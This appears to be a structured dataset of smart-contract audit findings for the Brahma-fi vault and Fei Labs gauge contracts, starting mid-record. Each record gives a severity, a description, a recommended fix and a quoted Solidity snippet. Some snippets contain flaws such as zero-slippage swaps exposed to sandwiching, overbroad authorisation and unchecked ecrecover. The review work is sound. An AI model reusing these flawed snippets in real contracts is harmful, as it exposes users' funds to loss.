It uses yieldEarned which is denominated in ETH and simply divides it by the normalization factor to get the correct number of decimals, which still returns back an amount denominated in ETH, whereas an amount denominated in LP tokens should be returned instead.\\nThis could lead to significant accounting issues including losses in the “no-loss” parts of the vault's strategy as 1 LP token is almost always guaranteed to be worth more than 1 ETH. So, when the intention is to withdraw `X` ETH worth of an LP token, withdrawing `X` LP tokens will actually withdraw `Y` ETH worth of an LP token, where `Y>X`. As a result, less than expected ETH will remain in the Convex handler part of the vault, and the ETH yield will go to the Lyra options, which are much riskier. In the event Lyra options don't work out and there is more ETH withdrawn than expected, there is a possibility that this would result in a loss for the vault.чThe fix is straightforward and that is to calculate `lpTokenEarned` using the `currentSharePrice` already received from the Curve pool. That way, it is the amount of LP tokens that will be sent to be unwrapped and unstaked from the Convex and Curve pools. This will also take care of the normalization factor. 
`uint256 `lpTokenEarned` = yieldEarned / currentSharePrice;`чч```\\nuint256 currentSharePrice = ethStEthPool.get\\_virtual\\_price();\\nif (currentSharePrice > prevSharePrice) {\\n // claim any gain on lp token yields\\n uint256 contractLpTokenBalance = lpToken.balanceOf(address(this));\\n uint256 totalLpBalance = contractLpTokenBalance +\\n baseRewardPool.balanceOf(address(this));\\n uint256 yieldEarned = (currentSharePrice - prevSharePrice) \\*\\n totalLpBalance;\\n```\\n -The WETH tokens are not taken into account in the ConvexTradeExecutor.totalFunds functionчhighчThe `totalFunds` function of every executor should include all the funds that belong to the contract:\\n```\\nfunction totalFunds() public view override returns (uint256, uint256) {\\n return ConvexPositionHandler.positionInWantToken();\\n}\\n```\\n\\nThe `ConvexTradeExecutor` uses this function for calculations:\\n```\\nfunction positionInWantToken()\\n public\\n view\\n override\\n returns (uint256, uint256)\\n{\\n (\\n uint256 stakedLpBalanceInETH,\\n uint256 lpBalanceInETH,\\n uint256 ethBalance\\n ) = \\_getTotalBalancesInETH(true);\\n\\n return (\\n stakedLpBalanceInETH + lpBalanceInETH + ethBalance,\\n block.number\\n );\\n}\\n```\\n\\n```\\nfunction \\_getTotalBalancesInETH(bool useVirtualPrice)\\n internal\\n view\\n returns (\\n uint256 stakedLpBalance,\\n uint256 lpTokenBalance,\\n uint256 ethBalance\\n )\\n{\\n uint256 stakedLpBalanceRaw = baseRewardPool.balanceOf(address(this));\\n uint256 lpTokenBalanceRaw = lpToken.balanceOf(address(this));\\n\\n uint256 totalLpBalance = stakedLpBalanceRaw + lpTokenBalanceRaw;\\n\\n // Here, in order to prevent price manipulation attacks via curve pools,\\n // When getting total position value -> its calculated based on virtual price\\n // During withdrawal -> calc\\_withdraw\\_one\\_coin() is used to get an actual estimate of ETH received if we were to remove liquidity\\n // The following checks account for this\\n uint256 totalLpBalanceInETH = 
useVirtualPrice\\n ? \\_lpTokenValueInETHFromVirtualPrice(totalLpBalance)\\n : \\_lpTokenValueInETH(totalLpBalance);\\n\\n lpTokenBalance = useVirtualPrice\\n ? \\_lpTokenValueInETHFromVirtualPrice(lpTokenBalanceRaw)\\n : \\_lpTokenValueInETH(lpTokenBalanceRaw);\\n\\n stakedLpBalance = totalLpBalanceInETH - lpTokenBalance;\\n ethBalance = address(this).balance;\\n}\\n```\\n\\nThis function includes ETH balance, LP balance, and staked balance. But WETH balance is not included here. WETH tokens are initially transferred to the contract, and before the withdrawal, the contract also stores WETH.чInclude WETH balance into the `totalFunds`.чч```\\nfunction totalFunds() public view override returns (uint256, uint256) {\\n return ConvexPositionHandler.positionInWantToken();\\n}\\n```\\n -LyraPositionHandlerL2 inaccurate modifier onlyAuthorized may lead to funds loss if keeper is compromisedчmediumчThe `LyraPositionHandlerL2` contract is operated either by the L2 keeper or by the L1 `LyraPositionHandler` via the `L2CrossDomainMessenger`. This is implemented through the `onlyAuthorized` modifier:\\n```\\nmodifier onlyAuthorized() {\\n require(\\n ((msg.sender == L2CrossDomainMessenger &&\\n OptimismL2Wrapper.messageSender() == positionHandlerL1) ||\\n msg.sender == keeper),\\n \"ONLY\\_AUTHORIZED\"\\n );\\n \\_;\\n}\\n```\\n\\nThis is set on:\\n`withdraw()`\\n`openPosition()`\\n`closePosition()`\\n`setSlippage()`\\n`deposit()`\\n`sweep()`\\n`setSocketRegistry()`\\n`setKeeper()`\\nFunctions 1-3 have a corresponding implementation on the L1 `LyraPositionHandler`, so they could indeed be called by it with the right parameters. However, 4-8 do not have an implemented way to call them from L1, and this modifier creates an unnecessarily expanded list of authorised entities that can call them.\\nAdditionally, even if their implementation is provided, it needs to be done carefully because `msg.sender` in their case is going to end up being the `L2CrossDomainMessenger`. 
For example, the `sweep()` function sends any specified token to `msg.sender`, with the intention likely being that the recipient is under the team's or the governance's control - yet, it will be `L2CrossDomainMessenger` and the tokens will likely be lost forever instead.\\nOn the other hand, the `setKeeper()` function would need a way to be called by something other than the keeper because it is intended to change the keeper itself. In the event that the access to the L2 keeper is compromised, and the L1 `LyraPositionHandler` has no way to call `setKeeper()` on the `LyraPositionHandlerL2`, the whole contract and its funds will be compromised as well. So, there needs to be some way to at least call the `setKeeper()` by something other than the keeper to ensure security of the funds on L2.\\n```\\nfunction closePosition(bool toSettle) public override onlyAuthorized {\\n LyraController.\\_closePosition(toSettle);\\n UniswapV3Controller.\\_estimateAndSwap(\\n false,\\n LyraController.sUSD.balanceOf(address(this))\\n );\\n}\\n\\n/\\*///////////////////////////////////////////////////////////////\\n MAINTAINANCE FUNCTIONS\\n//////////////////////////////////////////////////////////////\\*/\\n\\n/// @notice Sweep tokens\\n/// @param \\_token Address of the token to sweepr\\nfunction sweep(address \\_token) public override onlyAuthorized {\\n IERC20(\\_token).transfer(\\n msg.sender,\\n IERC20(\\_token).balanceOf(address(this))\\n );\\n}\\n\\n/// @notice socket registry setter\\n/// @param \\_socketRegistry new address of socket registry\\nfunction setSocketRegistry(address \\_socketRegistry) public onlyAuthorized {\\n socketRegistry = \\_socketRegistry;\\n}\\n\\n/// @notice keeper setter\\n/// @param \\_keeper new keeper address\\nfunction setKeeper(address \\_keeper) public onlyAuthorized {\\n keeper = \\_keeper;\\n}\\n```\\nчCreate an additional modifier for functions intended to be called just by the keeper (onlyKeeper) such as functions 4-7, and create an additional 
modifier `onlyGovernance` for the `setKeeper()` function. As an example, the L1 `Vault` contract also has a `setKeeper()` function that has a `onlyGovernance()` modifier. Please note that this will likely require implementing a function for the system's governance that can call `LyraPositionHandlerL2.setKeeper()` via the `L2CrossDomainMessenger`.чч```\\nmodifier onlyAuthorized() {\\n require(\\n ((msg.sender == L2CrossDomainMessenger &&\\n OptimismL2Wrapper.messageSender() == positionHandlerL1) ||\\n msg.sender == keeper),\\n \"ONLY\\_AUTHORIZED\"\\n );\\n \\_;\\n}\\n```\\n -Harvester.harvest swaps have no slippage parametersчmediumчAs part of the vault strategy, all reward tokens for staking in the Convex ETH-stETH pool are claimed and swapped into ETH. The swaps for these tokens are done with no slippage at the moment, i.e. the expected output amount for all of them is given as 0.\\nIn particular, one reward token that is most susceptible to slippage is LDO, and its swap is implemented through the Uniswap router:\\n```\\nfunction \\_swapLidoForWETH(uint256 amountToSwap) internal {\\n IUniswapSwapRouter.ExactInputSingleParams\\n memory params = IUniswapSwapRouter.ExactInputSingleParams({\\n tokenIn: address(ldo),\\n tokenOut: address(weth),\\n fee: UNISWAP\\_FEE,\\n recipient: address(this),\\n deadline: block.timestamp,\\n amountIn: amountToSwap,\\n amountOutMinimum: 0,\\n sqrtPriceLimitX96: 0\\n });\\n uniswapRouter.exactInputSingle(params);\\n}\\n```\\n\\nThe swap is called with `amountOutMinimum: 0`, meaning that there is no slippage protection in this swap. This could result in a significant loss of yield from this reward as MEV bots could “sandwich” this swap by manipulating the price before this transaction and immediately reversing their action after the transaction, profiting at the expense of our swap. 
Moreover, the Uniswap pools seem to have low liquidity for the LDO token as opposed to Balancer or Sushiswap, further magnifying slippage issues and susceptibility to frontrunning.\\nThe other two tokens - CVX and CRV - are being swapped through their Curve pools, which have higher liquidity and are less susceptible to slippage. Nonetheless, MEV strategies have been getting more advanced and calling these swaps with 0 as expected output may place these transactions in danger of being frontrun and “sandwiched” as well.\\n```\\nif (cvxBalance > 0) {\\n cvxeth.exchange(1, 0, cvxBalance, 0, false);\\n}\\n// swap CRV to WETH\\nif (crvBalance > 0) {\\n crveth.exchange(1, 0, crvBalance, 0, false);\\n}\\n```\\n\\nIn these calls `.exchange` , the last `0` is the `min_dy` argument in the Curve pools swap functions that represents the minimum expected amount of tokens received after the swap, which is `0` in our case.чIntroduce some slippage parameters into the swaps.чч```\\nfunction \\_swapLidoForWETH(uint256 amountToSwap) internal {\\n IUniswapSwapRouter.ExactInputSingleParams\\n memory params = IUniswapSwapRouter.ExactInputSingleParams({\\n tokenIn: address(ldo),\\n tokenOut: address(weth),\\n fee: UNISWAP\\_FEE,\\n recipient: address(this),\\n deadline: block.timestamp,\\n amountIn: amountToSwap,\\n amountOutMinimum: 0,\\n sqrtPriceLimitX96: 0\\n });\\n uniswapRouter.exactInputSingle(params);\\n}\\n```\\n -Harvester.rewardTokens doesn't account for LDO tokensчmediumчAs part of the vault's strategy, the reward tokens for participating in Curve's ETH-stETH pool and Convex staking are claimed and swapped for ETH. This is done by having the `ConvexPositionHandler` contract call the reward claims API from Convex via `baseRewardPool.getReward()`, which transfers the reward tokens to the handler's address. 
Then, the tokens are iterated through and sent to the harvester to be swapped from `ConvexPositionHandler` by getting their list from `harvester.rewardTokens()` and calling `harvester.harvest()`\\n```\\n// get list of tokens to transfer to harvester\\naddress[] memory rewardTokens = harvester.rewardTokens();\\n//transfer them\\nuint256 balance;\\nfor (uint256 i = 0; i < rewardTokens.length; i++) {\\n balance = IERC20(rewardTokens[i]).balanceOf(address(this));\\n\\n if (balance > 0) {\\n IERC20(rewardTokens[i]).safeTransfer(\\n address(harvester),\\n balance\\n );\\n }\\n}\\n\\n// convert all rewards to WETH\\nharvester.harvest();\\n```\\n\\nHowever, `harvester.rewardTokens()` doesn't have the LDO token's address in its list, so they will not be transferred to the harvester to be swapped.\\n```\\nfunction rewardTokens() external pure override returns (address[] memory) {\\n address[] memory rewards = new address[](2);\\n rewards[0] = address(crv);\\n rewards[1] = address(cvx);\\n return rewards;\\n}\\n```\\n\\nAs a result, `harvester.harvest()` will not be able to execute its `_swapLidoForWETH()` function since its `ldoBalance` will be 0. This results in missed rewards and therefore yield for the vault as part of its normal flow.\\nThere is a possible mitigation in the current state of the contract that would require governance to call `sweep()` on the LDO balance from the `BaseTradeExecutor` contract (that `ConvexPositionHandler` inherits) and then transferring those LDO tokens to the harvester contract to perform the swap at a later rewards claim. 
This, however, requires transactions separate from the intended flow of the system as well as governance intervention.чAdd the LDO token address to the `rewardTokens()` function by adding the following line `rewards[2] = address(ldo);`чч```\\n// get list of tokens to transfer to harvester\\naddress[] memory rewardTokens = harvester.rewardTokens();\\n//transfer them\\nuint256 balance;\\nfor (uint256 i = 0; i < rewardTokens.length; i++) {\\n balance = IERC20(rewardTokens[i]).balanceOf(address(this));\\n\\n if (balance > 0) {\\n IERC20(rewardTokens[i]).safeTransfer(\\n address(harvester),\\n balance\\n );\\n }\\n}\\n\\n// convert all rewards to WETH\\nharvester.harvest();\\n```\\n -Keeper design complexityчmediumчThe current design of the protocol relies on the keeper being operated correctly in a complex manner. Since the offchain code for the keeper wasn't in scope of this audit, the following is a commentary on the complexity of the keeper operations in the context of the contracts. Keeper logic such as the order of operations and function argument parameters with log querying are some examples where if the keeper doesn't execute them correctly, there may be inconsistencies and issues with accounting of vault shares and vault funds resulting in unexpected behaviour. While it may represent little risk or issues to the current Brahma-fi team as the vault is recently live, the keeper logic and exact steps should be well documented so that public keepers (if and when they are enabled) can execute the logic securely and future iterations of the vault code can account for any intricacies of the keeper logic.\\n1. Order of operations: Convex rewards & new depositors profiting at the expense of old depositors' yielded reward tokens. As part of the vault's strategy, the depositors' ETH is provided to Curve and the LP tokens are staked in Convex, which yield rewards such as CRV, CVX, and LDO tokens. 
As new depositors provide their ETH, the vault shares minted for their deposits will be less compared to old deposits as they account for the increasing value of LP tokens staked in these pools. In other words, if the first depositor provides 1 ETH, then when a new depositor provides 1 ETH much later, the new depositor will get less shares back as the `totalVaultFunds()` will increase:\\n```\\nshares = totalSupply() > 0\\n ? (totalSupply() \\* amountIn) / totalVaultFunds()\\n : amountIn;\\n```\\n\\n```\\nfunction totalVaultFunds() public view returns (uint256) {\\n return\\n IERC20(wantToken).balanceOf(address(this)) + totalExecutorFunds();\\n}\\n```\\n\\n```\\nfunction totalFunds() public view override returns (uint256, uint256) {\\n return ConvexPositionHandler.positionInWantToken();\\n}\\n```\\n\\n```\\nfunction positionInWantToken()\\n public\\n view\\n override\\n returns (uint256, uint256)\\n{\\n (\\n uint256 stakedLpBalanceInETH,\\n uint256 lpBalanceInETH,\\n uint256 ethBalance\\n ) = \\_getTotalBalancesInETH(true);\\n\\n return (\\n stakedLpBalanceInETH + lpBalanceInETH + ethBalance,\\n block.number\\n );\\n}\\n```\\n\\nHowever, this does not account for the reward tokens yielded throughout that time. From the smart contract logic alone, there is no requirement to first execute the reward token harvest. It is up to the keeper to execute `ConvexTradeExecutor.claimRewards` in order to claim and swap their rewards into ETH, which only then will be included into the yield in the above `ConvexPositionHandler.positionInWantToken` function. If this is not done prior to processing new deposits and minting new shares, new depositors would unfairly benefit from the reward tokens' yield that was generated before they deposited but accounted for in the vault funds only after they deposited.\\n2. 
Order of operations: closing Lyra options before processing new deposits.\\nThe other part of the vault's strategy is utilising the yield from Convex to purchase options from Lyra on Optimism. While Lyra options are risky and can become worthless in the event of bad trades, only yield is used for them, therefore keeping user deposits' initial value safe. However, their value could also yield significant returns, increasing the overall funds of the vault. Just as with `ConvexTradeExecutor`, `LyraTradeExecutor` also has a `totalFunds()` function that feeds into the vault's `totalVaultFunds()` function. In Lyra's case, however, it is a manually set value by the keeper that is supposed to represent the value of Lyra L2 options:\\n```\\nfunction totalFunds()\\n public\\n view\\n override\\n returns (uint256 posValue, uint256 lastUpdatedBlock)\\n{\\n return (\\n positionInWantToken.posValue +\\n IERC20(vaultWantToken()).balanceOf(address(this)),\\n positionInWantToken.lastUpdatedBlock\\n );\\n}\\n```\\n\\n```\\nfunction setPosValue(uint256 \\_posValue) public onlyKeeper {\\n LyraPositionHandler.\\_setPosValue(\\_posValue);\\n}\\n```\\n\\n```\\nfunction \\_setPosValue(uint256 \\_posValue) internal {\\n positionInWantToken.posValue = \\_posValue;\\n positionInWantToken.lastUpdatedBlock = block.number;\\n}\\n```\\n\\nSolely from the smart contract logic, there is a possibility that a user deposits when Lyra options are valued high, meaning the total vault funds are high as well, thus decreasing the amount of shares the user would have received if it weren't for the Lyra options' value. 
Consequently, if after the deposit the Lyra options become worthless, decreasing the total vault funds, the user's newly minted shares will now represent less than what they have deposited.\\nWhile this is not currently mitigated by smart contract logic, it may be worked around by the keeper first settling and closing all Lyra options and transferring all their yielded value in ETH, if any, to the Convex trade executor. Only then the keeper would process new deposits and mint new shares. This order of operations is critical to maintain the vault's intended safe strategy of maintaining the user's deposited value, and is dependent entirely on the keeper offchain logic.\\n3. Order of operations: additional trade executors and their specific management Similarly to the above examples, as more trade executors and position handlers are added to the vault, the complexity for the keeper will go up significantly, requiring it to maintain all correct orders of operations not just to keep the shares and funds accounting intact, but simply for the trade executors to function normally. For example, in the case of Lyra, the keepers need to manually call `confirmDeposit` and `confirmWithdraw` to update their `depositStatus` and `withdrawalStatus` respectively to continue normal operations or otherwise new deposits and withdrawals wouldn't be processed. On the other hand, the Convex executor does it automatically. Due to the system design, there may be no single standard way to handle a trade executor. New executors may also require specific calls to be done manually, increasing overall complexity keeper logic to support the system.\\n4. Keeper calls & arguments: depositFunds/batchDeposit and initiateWithdrawal/batchWithdraw `userAddresses[]` array + gas overhead With the current gated approach and batching for deposits and withdrawals to and from the vault, users aren't able to directly mint and redeem their vault shares. 
Instead, they interact with the `Batcher` contract that then communicates with the `Vault` contract with the help of the keeper. However, while each user's deposit and withdrawal amounts are registered in the contract state variables such as `depositLedger[user]` and `withdrawLedger[user]`, and there is an event emitted with the user address and their action, to process them the keeper is required to keep track of all the user addresses in the batch they need to process. In particular, the keeper needs to provide `address[] memory users` for both `batchDeposit()` and `batchWithdraw()` functions that communicate with the vault. There is no stored list of users within the contract that could provide or verify the right users, so it is entirely up to the keeper's offchain logic to query the logs and retrieve the addresses required. Therefore, depending on the size of the `address[] memory users` array, the keepers may need to consider the transaction gas limit, possibly requiring splitting the array up and doing several transactions to process all of them. In addition, in the event of withdrawals, the keepers need to calculate how much of the `wantToken` (WETH in our case) will be required to process the withdrawals, and call `withdrawFromExecutor()` with that amount to provide enough assets to cover withdrawals from the vault.\\n5. Timing: 50 block radius for updates on trade executors that need to have their values updated via a call Some trade executors, like the Convex one, can retrieve their funds value at any time from Layer 1, thereby always being up to date with the current block. Others, like the Lyra trade executor, require the keeper to update their position value by initiating a call, which also updates their `positionInWantToken.lastUpdatedBlock` state variable. 
However, this variable is also read during the `vault.totalVaultFunds()` call during deposits and withdrawals via `totalExecutorFunds()`, which eventually calls `areFundsUpdated(blockUpdated)`. This is a check to ensure that the current transaction's `block.number <= _blockUpdated + BLOCK_LIMIT`, where BLOCK_LIMIT=50 blocks, i.e. roughly 12-15 min. As a result, keepers need to make sure that all executors that require a call for this have their position values updated before and rather close to processing and deposits or withdrawals, or `areFundsUpdated()` will revert those calls.чDocument the exact order of operations, steps, necessary logs and parameters that keepers need to keep track of in order for the vault strategy to succeed.чч```\\nshares = totalSupply() > 0\\n ? (totalSupply() \\* amountIn) / totalVaultFunds()\\n : amountIn;\\n```\\n -Approving MAX_UINT amount of ERC20 tokensчlowчApproving the maximum value of uint256 is a known practice to save gas. However, this pattern was proven to increase the impact of an attack many times in the past, in case the approved contract gets hacked.\\n```\\nIERC20(vaultWantToken()).approve(vault, MAX\\_INT);\\n```\\n\\n```\\nIERC20(vaultInfo.tokenAddress).approve(vaultAddress, type(uint256).max);\\n```\\n\\n```\\nIERC20(LP\\_TOKEN).safeApprove(ETH\\_STETH\\_POOL, type(uint256).max);\\n\\n// Approve max LP tokens to convex booster\\nIERC20(LP\\_TOKEN).safeApprove(\\n address(CONVEX\\_BOOSTER),\\n type(uint256).max\\n);\\n```\\n\\n```\\ncrv.safeApprove(address(crveth), type(uint256).max);\\n// max approve CVX to CVX/ETH pool on curve\\ncvx.safeApprove(address(cvxeth), type(uint256).max);\\n// max approve LDO to uniswap swap router\\nldo.safeApprove(address(uniswapRouter), type(uint256).max);\\n```\\n\\n```\\nIERC20(wantTokenL2).safeApprove(\\n address(UniswapV3Controller.uniswapRouter),\\n type(uint256).max\\n);\\n// approve max susd balance to uniV3 router\\nLyraController.sUSD.safeApprove(\\n 
address(UniswapV3Controller.uniswapRouter),\\n type(uint256).max\\n);\\n```\\nчConsider approving the exact amount that's needed to be transferred, or alternatively, add an external function that allows the revocation of approvals.чч```\\nIERC20(vaultWantToken()).approve(vault, MAX\\_INT);\\n```\\n -Batcher.depositFunds may allow for more deposits than vaultInfo.maxAmountчlowчAs part of a gradual rollout strategy, the Brahma-fi system of contracts has a limit of how much can be deposited into the protocol. This is implemented through the `Batcher` contract that allows users to deposit into it and keep the amount they have deposited in the `depositLedger[recipient]` state variable. In order to cap how much is deposited, the user's input `amountIn` is evaluated within the following statement:\\n```\\nrequire(\\n IERC20(vaultInfo.vaultAddress).totalSupply() +\\n pendingDeposit -\\n pendingWithdrawal +\\n amountIn <=\\n vaultInfo.maxAmount,\\n \"MAX\\_LIMIT\\_EXCEEDED\"\\n);\\n```\\n\\nHowever, while `pendingDeposit`, `amountIn`, and `vaultInfo.maxAmount` are denominated in the vault asset token (WETH in our case), `IERC20(vaultInfo.vaultAddress).totalSupply()` and `pendingWithdrawal` represent vault shares tokens, creating potential mismatches in this evaluation.\\nAs the yield brings in more and more funds to the vault, the amount of share minted for each token deposited in decreases, so `totalSupply()` becomes less than the total deposited amount (not just vault funds) as the strategy succeeds over time. For example, at first `X` deposited tokens would mint `X` shares. After some time, this would create additional funds in the vault through yield, and another `X` deposit of tokens would mint less than `X` shares, say `X-Y`, where `Y` is some number greater than 0 representing the difference in the number of shares minted. So, while there were `2*X` deposited tokens, `totalSupply()=(2*X-Y)` shares would have been minted in total. 
However, at the time of the next deposit, a user's `amountIn` will be added with `totalSupply()=(2*X-Y)` number of shares instead of a greater `2*X` number of deposited tokens. So, this will undershoot the actual amount of tokens deposited after this user's deposit, thus potentially evaluating it less than `maxAmount`, and letting more user deposits get inside the vault than what was intended.чConsider either documenting this potential discrepancy or keeping track of all deposits in a state variable and using that inside the `require` statement..чч```\\nrequire(\\n IERC20(vaultInfo.vaultAddress).totalSupply() +\\n pendingDeposit -\\n pendingWithdrawal +\\n amountIn <=\\n vaultInfo.maxAmount,\\n \"MAX\\_LIMIT\\_EXCEEDED\"\\n);\\n```\\n -BaseTradeExecutor.confirmDeposit | confirmWithdraw - Violation of the “checks-effects-interactions” patternчlowчBoth `confirmDeposit, confirmWithdraw` might be re-entered by the keeper (in case it is a contract), in case the derived contract allows the execution of untrusted code.\\n```\\nfunction confirmDeposit() public override onlyKeeper {\\n require(depositStatus.inProcess, \"DEPOSIT\\_COMPLETED\");\\n \\_confirmDeposit();\\n depositStatus.inProcess = false;\\n}\\n```\\n\\n```\\nfunction confirmWithdraw() public override onlyKeeper {\\n require(withdrawalStatus.inProcess, \"WIHDRW\\_COMPLETED\");\\n \\_confirmWithdraw();\\n withdrawalStatus.inProcess = false;\\n}\\n```\\nчAlthough the impact is very limited, it is recommended to implement the “checks-effects-interactions” in both functions.чч```\\nfunction confirmDeposit() public override onlyKeeper {\\n require(depositStatus.inProcess, \"DEPOSIT\\_COMPLETED\");\\n \\_confirmDeposit();\\n depositStatus.inProcess = false;\\n}\\n```\\n -Reactivated gauges can't queue up rewardsчhighчActive gauges as set in `ERC20Gauges.addGauge()` function by authorised users get their rewards queued up in the `FlywheelGaugeRewards._queueRewards()` function. 
As part of it, their associated struct `QueuedRewards` updates its `storedCycle` value to the cycle in which they get queued up:\\n```\\ngaugeQueuedRewards[gauge] = QueuedRewards({\\n priorCycleRewards: queuedRewards.priorCycleRewards + completedRewards,\\n cycleRewards: uint112(nextRewards),\\n storedCycle: currentCycle\\n});\\n```\\n\\nHowever, these gauges may be deactivated in `ERC20Gauges.removeGauge()`, and they will now be ignored in either `FlywheelGaugeRewards.queueRewardsForCycle()` or `FlywheelGaugeRewards.queueRewardsForCyclePaginated()` because both use `gaugeToken.gauges()` to get the set of gauges for which to queue up rewards for the cycle, and that only gives active gauges. Therefore, any updates `FlywheelGaugeRewards` makes to its state will not be done to deactivated gauges' `QueuedRewards` structs. In particular, the `gaugeCycle` contract state variable will keep advancing throughout its cycles, while `QueuedRewards.storedCycle` will retain its previously set value, which is the cycle where it was queued and not 0.\\nOnce reactivated later with at least 1 full cycle being done without it, it will produce issues. It will now be returned by `gaugeToken.gauges()` to be processed in either FlywheelGaugeRewards.queueRewardsForCycle()or `FlywheelGaugeRewards.queueRewardsForCyclePaginated()`, but, once the reactivated gauge is passed to `_queueRewards()`, it will fail an assert:\\n```\\nassert(queuedRewards.storedCycle == 0 || queuedRewards.storedCycle >= lastCycle);\\n```\\n\\nThis is because it already has a set value from the cycle it was processed in previously (i.e. 
storedCycle>0), and, since that cycle is at least 1 full cycle behind the state contract, it will also not pass the second condition `queuedRewards.storedCycle >= lastCycle`.\\nThe result is that this gauge is locked out of queuing up for rewards because `queuedRewards.storedCycle` is only synchronised with the contract's cycle later in `_queueRewards()` which will now always fail for this gauge.чAccount for the reactivated gauges that previously went through the rewards queue process, such as introducing a separate flow for newly activated gauges. However, any changes such as removing the above mentioned `assert()` should be carefully validated for other downstream logic that may use the `QueuedRewards.storedCycle` value. Therefore, it is recommended to review the state transitions as opposed to only passing this specific check.чч```\\ngaugeQueuedRewards[gauge] = QueuedRewards({\\n priorCycleRewards: queuedRewards.priorCycleRewards + completedRewards,\\n cycleRewards: uint112(nextRewards),\\n storedCycle: currentCycle\\n});\\n```\\n -Reactivated gauges have incorrect accounting for the last cycle's rewardsчmediumчAs described in https://github.com/ConsenSysDiligence/fei-labs-audit-2022-04/issues/3, reactivated gauges that previously had queued up rewards have a mismatch between their `storedCycle` and contract's `gaugeCycle` state variable.\\nDue to this mismatch, there is also a resulting issue with the accounting logic for its completed rewards:\\n```\\nuint112 completedRewards = queuedRewards.storedCycle == lastCycle ? queuedRewards.cycleRewards : 0;\\n```\\n\\nConsequently, this then produces an incorrect value for QueuedRewards.priorCycleRewards:\\n```\\npriorCycleRewards: queuedRewards.priorCycleRewards + completedRewards,\\n```\\n\\nAs now `completedRewards` will be equal to 0 instead of the previous cycle's rewards for that gauge. 
This may cause a loss of rewards accounted for this gauge as this value is later used in `getAccruedRewards()`.чConsider changing the logic of the check so that `storedCycle` values further in the past than `lastCycle` may produce the right rewards return for this expression, such as using `<=` instead of `==` and adding an explicit check for `storedCycle` `==` 0 to account for the initial scenario.чч```\\nuint112 completedRewards = queuedRewards.storedCycle == lastCycle ? queuedRewards.cycleRewards : 0;\\n```\\n -Lack of input validation in delegateBySigчlowч```\\nfunction delegateBySig(\\n address delegatee,\\n uint256 nonce,\\n uint256 expiry,\\n uint8 v,\\n bytes32 r,\\n bytes32 s\\n) public {\\n require(block.timestamp <= expiry, \"ERC20MultiVotes: signature expired\");\\n address signer = ecrecover(\\n keccak256(\\n abi.encodePacked(\\n \"\\x19\\x01\",\\n DOMAIN\\_SEPARATOR(),\\n keccak256(abi.encode(DELEGATION\\_TYPEHASH, delegatee, nonce, expiry))\\n )\\n ),\\n v,\\n r,\\n s\\n );\\n require(nonce == nonces[signer]++, \"ERC20MultiVotes: invalid nonce\");\\n \\_delegate(signer, delegatee);\\n}\\n```\\nчIntroduce a zero address check i.e `require signer!=address(0)` and check if the recovered signer is an expected address. 
Refer to ERC20's permit for inspiration.чч```\\nfunction delegateBySig(\\n address delegatee,\\n uint256 nonce,\\n uint256 expiry,\\n uint8 v,\\n bytes32 r,\\n bytes32 s\\n) public {\\n require(block.timestamp <= expiry, \"ERC20MultiVotes: signature expired\");\\n address signer = ecrecover(\\n keccak256(\\n abi.encodePacked(\\n \"\\x19\\x01\",\\n DOMAIN\\_SEPARATOR(),\\n keccak256(abi.encode(DELEGATION\\_TYPEHASH, delegatee, nonce, expiry))\\n )\\n ),\\n v,\\n r,\\n s\\n );\\n require(nonce == nonces[signer]++, \"ERC20MultiVotes: invalid nonce\");\\n \\_delegate(signer, delegatee);\\n}\\n```\\n -Decreasing maxGauges does not account for users' previous gauge list size.чlowч`ERC20Gauges` contract has a `maxGauges` state variable meant to represent the maximum amount of gauges a user can allocate to. As per the natspec, it is meant to protect against gas DOS attacks upon token transfer to allow complicated transactions to fit in a block. There is also a function `setMaxGauges` for authorised users to decrease or increase this state variable.\\n```\\nfunction setMaxGauges(uint256 newMax) external requiresAuth {\\n uint256 oldMax = maxGauges;\\n maxGauges = newMax;\\n\\n emit MaxGaugesUpdate(oldMax, newMax);\\n}\\n```\\n\\nHowever, if it is decreased and there are users that have already reached the previous maximum that was larger, there may be unexpected behavior. All of these users' gauges will remain active and manageable, such as have user gauge weights incremented or decremented. So it could be possible that for such a user address `user_address`, numUserGauges(user_address) > `maxGauges`. While in the current contract logic this does not cause issues, `maxGauges` is a public variable that may be used by other systems. 
If unaccounted for, this discrepancy between the contract's `maxGauges` and the users' actual number of gauges given by `numUserGauges()` could, for example, cause gauges to be skipped or fail loops bounded by `maxGauges` in other systems' logic that try and go through all user gauges.чEither document the potential discrepancy between the user gauges size and the `maxGauges` state variable, or limit `maxGauges` to be only called within the contract thereby forcing other contracts to retrieve user gauge list size through `numUserGauges()`.чч```\\nfunction setMaxGauges(uint256 newMax) external requiresAuth {\\n uint256 oldMax = maxGauges;\\n maxGauges = newMax;\\n\\n emit MaxGaugesUpdate(oldMax, newMax);\\n}\\n```\\n -Decrementing a gauge by 0 that is not in the user gauge list will fail an assert.чlowч`ERC20Gauges._decrementGaugeWeight` has an edge case scenario where a user can attempt to decrement a `gauge` that is not in the user `gauge` list by 0 `weight`, which would trigger a failure in an assert.\\n```\\nfunction \\_decrementGaugeWeight(\\n address user,\\n address gauge,\\n uint112 weight,\\n uint32 cycle\\n) internal {\\n uint112 oldWeight = getUserGaugeWeight[user][gauge];\\n\\n getUserGaugeWeight[user][gauge] = oldWeight - weight;\\n if (oldWeight == weight) {\\n // If removing all weight, remove gauge from user list.\\n assert(\\_userGauges[user].remove(gauge));\\n }\\n```\\n\\nAs `_decrementGaugeWeight`, `decrementGauge`, or `decrementGauges` don't explicitly check that a `gauge` belongs to the user, the contract logic continues with its operations in `_decrementGaugeWeight` for any gauges passed to it. 
In general this is fine because if a user tries to decrement non-zero `weight` from a `gauge` they have no allocation to, thus getting `getUserGaugeWeight[user][gauge]=0`, there would be a revert due to a negative value being passed to `getUserGaugeWeight[user][gauge]`\\n```\\nuint112 oldWeight = getUserGaugeWeight[user][gauge];\\n\\ngetUserGaugeWeight[user][gauge] = oldWeight - weight;\\n```\\n\\nHowever, passing a `weight=0` parameter with a `gauge` that doesn't belong to the user, would successfully process that line. This would then be followed by an evaluation `if (oldWeight == weight)`, which would also succeed since both are 0, to finally reach an assert that will verify a remove of that `gauge` from the user `gauge` list. However, it will fail since it was never there in the first place.\\n```\\nassert(\\_userGauges[user].remove(gauge));\\n```\\n\\nAlthough an edge case with no effect on contract state's health, it may happen with front end bugs or incorrect user transactions, and it is best not to have asserts fail.чReplace `assert()` with a `require()` or verify that the gauge belongs to the user prior to performing any operations.чч```\\nfunction \\_decrementGaugeWeight(\\n address user,\\n address gauge,\\n uint112 weight,\\n uint32 cycle\\n) internal {\\n uint112 oldWeight = getUserGaugeWeight[user][gauge];\\n\\n 